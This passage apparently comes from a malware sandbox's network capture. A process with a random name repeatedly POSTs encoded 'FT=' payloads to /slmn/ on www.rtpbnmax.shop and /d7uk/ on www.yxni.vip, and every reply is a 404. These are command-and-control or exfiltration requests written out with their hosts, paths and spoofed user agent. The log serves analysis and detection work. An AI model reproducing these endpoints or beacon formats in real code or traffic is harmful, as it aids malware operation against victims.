Jan 11, 2025 05:05:26.350234032 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49991	67.223.118.94	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:28.312503099 CET	776	OUT	POST /slmn/ HTTP/1.1 Host: www.rtpbnmax.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.rtpbnmax.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.rtpbnmax.shop/slmn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 69 7a 35 49 38 39 69 49 30 4c 47 43 47 4a 6e 6e 57 49 54 36 32 76 54 41 78 48 57 63 79 72 6b 6a 63 36 46 30 38 6e 4e 53 4d 53 2b 5a 6c 50 79 41 6f 51 67 4f 58 41 71 4c 7a 69 33 44 44 44 74 4e 39 7a 58 56 44 70 43 37 77 50 6d 35 51 69 38 31 44 30 45 61 50 35 5a 32 78 79 6f 69 6d 6d 4e 78 37 4c 6e 7a 78 56 56 70 52 71 53 76 43 67 34 38 41 67 4c 58 79 73 74 44 70 56 53 33 61 6c 4f 54 53 71 6f 39 58 66 35 6a 5a 59 61 6a 76 44 38 68 2f 47 70 6b 31 2f 78 35 37 45 6e 33 57 33 52 39 7a 69 76 33 52 73 38 6c 42 6c 41 50 59 51 35 71 54 46 32 41 74 62 44 48 42 4e 31 41 59 4f 4e 35 79 56 39 7a 2b 70 46 73 6e 57 36 2b 32 55 2b 43 35 38 76 55 33 5a 78 31 2b 2f 53 39 4b 4e 2b 36 31 39 6e 5a 4c 43 34 3d Data Ascii: FT=iz5I89iI0LGCGJnnWIT62vTAxHWcyrkjc6F08nNSMS+ZlPyAoQgOXAqLzi3DDDtN9zXVDpC7wPm5Qi81D0EaP5Z2xyoimmNx7LnzxVVpRqSvCg48AgLXystDpVS3alOTSqo9Xf5jZYajvD8h/Gpk1/x57En3W3R9ziv3Rs8lBlAPYQ5qTF2AtbDHBN1AYON5yV9z+pFsnW6+2U+C58vU3Zx1+/S9KN+619nZLC4=
Jan 11, 2025 05:05:28.930388927 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:05:28 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 05:05:28.930468082 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49992	67.223.118.94	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:30.857801914 CET	1789	OUT	POST /slmn/ HTTP/1.1 Host: www.rtpbnmax.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.rtpbnmax.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.rtpbnmax.shop/slmn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 69 7a 35 49 38 39 69 49 30 4c 47 43 47 4a 6e 6e 57 49 54 36 32 76 54 41 78 48 57 63 79 72 6b 6a 63 36 46 30 38 6e 4e 53 4d 54 47 5a 6c 39 36 41 70 78 67 4f 57 41 71 4c 39 43 33 65 44 44 74 71 39 77 6e 52 44 70 4f 4e 77 4e 65 35 52 42 30 31 42 42 6f 61 45 35 5a 32 75 69 6f 6a 37 57 4e 6b 37 4c 33 2f 78 56 46 70 52 71 53 76 43 69 51 38 4a 56 2f 58 77 73 74 43 75 56 53 72 4e 56 50 36 53 75 45 4c 58 66 74 73 59 70 36 6a 76 6a 73 68 7a 56 4e 6b 71 50 78 33 32 6b 6e 76 57 33 63 36 7a 68 4b 4d 52 75 64 4f 42 6e 51 50 59 57 38 74 4c 6c 69 61 32 6f 48 67 4c 66 64 52 65 74 63 45 38 55 35 6e 38 4c 4a 72 70 30 61 66 2f 6e 36 30 38 37 36 79 71 49 35 32 79 64 2b 7a 47 6f 76 4b 6c 64 6a 70 4b 46 6c 69 6f 6f 59 77 70 43 43 55 69 6c 47 71 45 4b 38 5a 59 58 32 42 75 6c 6c 69 53 31 43 79 56 44 79 4b 70 2f 58 71 38 5a 78 4c 62 6c 32 6f 4d 56 47 4f 67 46 69 39 47 7a 47 4a 48 58 70 39 49 6d 52 48 62 4c 36 37 65 52 64 2f 4e 63 4e 51 36 45 41 4d 4f 2b 43 6d 46 6d 48 6d 2f 44 34 33 4d 68 33 41 7a 32 53 4f 4a 55 41 [TRUNCATED] Data Ascii: FT=iz5I89iI0LGCGJnnWIT62vTAxHWcyrkjc6F08nNSMTGZl96ApxgOWAqL9C3eDDtq9wnRDpONwNe5RB01BBoaE5Z2uioj7WNk7L3/xVFpRqSvCiQ8JV/XwstCuVSrNVP6SuELXftsYp6jvjshzVNkqPx32knvW3c6zhKMRudOBnQPYW8tLlia2oHgLfdRetcE8U5n8LJrp0af/n60876yqI52yd+zGovKldjpKFliooYwpCCUilGqEK8ZYX2BulliS1CyVDyKp/Xq8ZxLbl2oMVGOgFi9GzGJHXp9ImRHbL67eRd/NcNQ6EAMO+CmFmHm/D43Mh3Az2SOJUAQFgwGaLD6mxyI9b/zdkBFbC3rT+q1rfcAn6Qxz3K6kvvOEwLbCMMhVkxbf7WwjuS2OJyjA+6/KfpMdlB37b5QTY9ZW6jWHlTlfbON9tPx2p0uchFWIPys7VhKUBD+pXpIf9bD6dWusJYk1HX8dd4Ew6ISLUSbNksjtmEIxR70zF+orTyqXJaXZu7XPx18rP9hsn3/QuVDBVl8xYRsVmoFYGYKNzXQK3ASMRGt7X7DEpyfJzz/F2LLRezg2XnTAWofeO47b+0n7b5K7gkPPeZxno9f29rFJzlv/PQx0BViEFZygF6dhpX/+Ko2fbUOOULVWuRUitxpuWlmarqmdRE65b7rn7gxdpy/kp0KhW1AbkxjmO9xLYcXUusJRGe+Y7uV4UEoE89Kfc6ByaSZ8RUS8Aq2czJKbyh1OkeyLGTtq8mbEe0LLYjIf9ztzi++TqGYio0umhKmUBMP2SJrMg48ON9Zbn1yq//OUB6LnmOpl1hVo+HlftmoWM4Nl+eVD/ZjCmvpQf0fUhQEo93P4FVchZ/oiDxKqtn/C/eorfVrcLn6MfPlIuhllaNV4pz+rKeDaow0mkzE/JzR4/tt9na9KPudV5QyXycEpwgE4B1M+EBF/t28NIIYHxpnQr6KD8vmvlIL8obH5OOFlbrbnp3wAxg+a/1BSlAay [TRUNCATED]
Jan 11, 2025 05:05:31.431603909 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:05:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 05:05:31.431648970 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49993	67.223.118.94	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:33.398827076 CET	491	OUT	GET /slmn/?LZXLP=uRtDln&FT=vxRo/NbVr8++Da/4WcnE3/CMt1mo3pQSabR/jnYcNQmpsvXfiQpyTUTP9jDEDnRaomHmWLK2jOKhHQ02TF4XNId4tyIZnHFEhbycwWoVa5WMOCY2OT/zuf88phewPkHObckRHqNeZZ6B HTTP/1.1 Host: www.rtpbnmax.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:05:34.001019001 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:05:33 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 11, 2025 05:05:34.001040936 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49994	192.186.57.30	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:39.218615055 CET	741	OUT	POST /d7uk/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.yxni.vip Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.yxni.vip/d7uk/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 62 79 65 67 33 4b 71 55 6a 55 6b 2b 53 6b 46 54 4b 65 64 44 45 4e 6f 4b 59 62 75 67 64 30 6a 45 67 6b 71 52 6b 56 2f 4a 63 32 4d 52 65 51 66 73 65 38 37 5a 6d 6f 6d 6d 56 76 4c 63 36 2b 31 46 7a 4a 72 55 6b 52 62 51 69 2b 73 38 55 5a 44 67 72 50 65 6a 68 75 35 6e 62 48 75 5a 53 59 79 58 67 77 36 68 6d 42 72 7a 57 2b 69 2b 43 64 35 54 6e 63 4e 73 30 77 31 56 7a 55 61 4e 38 79 70 2b 6a 36 69 62 51 49 69 69 53 4f 75 32 6b 34 65 2b 39 42 59 6b 4a 43 38 70 35 43 5a 77 30 41 44 57 6a 54 7a 4b 34 38 6e 4e 4c 68 5a 41 74 69 5a 7a 4b 76 70 59 6c 58 58 46 41 44 53 6a 71 79 46 59 30 66 4a 52 6e 71 78 30 31 44 48 76 78 75 30 33 2b 67 3d 3d Data Ascii: FT=byeg3KqUjUk+SkFTKedDENoKYbugd0jEgkqRkV/Jc2MReQfse87ZmommVvLc6+1FzJrUkRbQi+s8UZDgrPejhu5nbHuZSYyXgw6hmBrzW+i+Cd5TncNs0w1VzUaN8yp+j6ibQIiiSOu2k4e+9BYkJC8p5CZw0ADWjTzK48nNLhZAtiZzKvpYlXXFADSjqyFY0fJRnqx01DHvxu03+g==
Jan 11, 2025 05:05:40.063213110 CET	407	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:38 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49995	192.186.57.30	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:41.784327984 CET	761	OUT	POST /d7uk/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.yxni.vip Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.yxni.vip/d7uk/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 62 79 65 67 33 4b 71 55 6a 55 6b 2b 53 46 31 54 4d 39 31 44 54 64 6f 4c 55 37 75 67 54 55 6a 41 67 6c 57 52 6b 58 54 67 63 46 6f 52 65 30 50 73 66 39 37 5a 68 6f 6d 6d 65 50 4c 6a 30 65 31 61 7a 4a 33 63 6b 54 66 51 69 2b 6f 38 55 5a 54 67 6f 34 71 73 68 2b 35 6c 51 6e 75 62 52 6f 79 58 67 77 36 68 6d 46 4b 6b 57 2b 36 2b 43 75 68 54 6e 2b 31 76 36 51 31 55 37 30 61 4e 34 79 70 36 6a 36 69 6c 51 4a 2b 49 53 49 69 32 6b 36 32 2b 39 56 4d 6e 44 43 38 77 6b 53 59 34 78 43 6a 64 74 7a 6a 6f 77 50 4c 5a 53 7a 64 2b 6f 55 59 52 51 4e 6c 30 37 47 76 2b 45 42 32 56 39 55 59 74 32 65 4e 4a 71 49 46 56 71 30 69 46 38 38 56 7a 6f 58 65 45 54 69 73 51 67 47 37 78 37 5a 73 77 6d 44 57 74 66 4b 4d 3d Data Ascii: FT=byeg3KqUjUk+SF1TM91DTdoLU7ugTUjAglWRkXTgcFoRe0Psf97ZhommePLj0e1azJ3ckTfQi+o8UZTgo4qsh+5lQnubRoyXgw6hmFKkW+6+CuhTn+1v6Q1U70aN4yp6j6ilQJ+ISIi2k62+9VMnDC8wkSY4xCjdtzjowPLZSzd+oUYRQNl07Gv+EB2V9UYt2eNJqIFVq0iF88VzoXeETisQgG7x7ZswmDWtfKM=
Jan 11, 2025 05:05:42.618367910 CET	407	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:41 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49996	192.186.57.30	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:44.325512886 CET	1774	OUT	POST /d7uk/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.yxni.vip Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.yxni.vip/d7uk/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 62 79 65 67 33 4b 71 55 6a 55 6b 2b 53 46 31 54 4d 39 31 44 54 64 6f 4c 55 37 75 67 54 55 6a 41 67 6c 57 52 6b 58 54 67 63 46 67 52 65 47 48 73 65 65 6a 5a 67 6f 6d 6d 64 50 4c 69 30 65 31 58 7a 4a 2f 59 6b 54 53 76 69 38 67 38 53 2f 66 67 67 73 32 73 75 2b 35 6c 4e 33 75 59 53 59 79 65 67 77 71 6c 6d 42 75 6b 57 2b 36 2b 43 72 74 54 77 38 4e 76 34 51 31 56 7a 55 61 42 38 79 70 43 6a 37 4b 31 51 4a 4c 2f 53 34 43 32 6c 61 6d 2b 2f 6d 6b 6e 4c 43 38 6c 33 69 59 4a 78 43 75 46 74 7a 76 6b 77 50 50 7a 53 7a 6c 2b 6f 31 78 49 4f 65 46 38 76 48 72 63 46 67 4b 41 37 57 55 65 2f 4e 4d 77 30 4b 52 71 70 33 79 52 2f 50 68 75 72 52 43 45 43 77 45 42 73 47 61 68 39 75 56 31 7a 57 2f 74 4b 64 4d 53 74 35 2f 59 39 73 42 5a 69 73 50 43 78 62 57 50 76 36 36 39 65 4d 47 48 61 49 2b 62 45 38 31 68 39 4c 72 48 38 32 61 79 59 66 32 31 42 45 36 68 6c 4a 35 71 30 42 30 63 4c 6c 6f 6e 34 35 43 41 68 65 6d 64 6b 67 30 4f 43 41 45 2b 70 4c 4c 66 50 37 55 46 46 33 68 57 50 76 6e 61 37 70 55 76 50 47 4d 73 74 49 65 [TRUNCATED] Data Ascii: 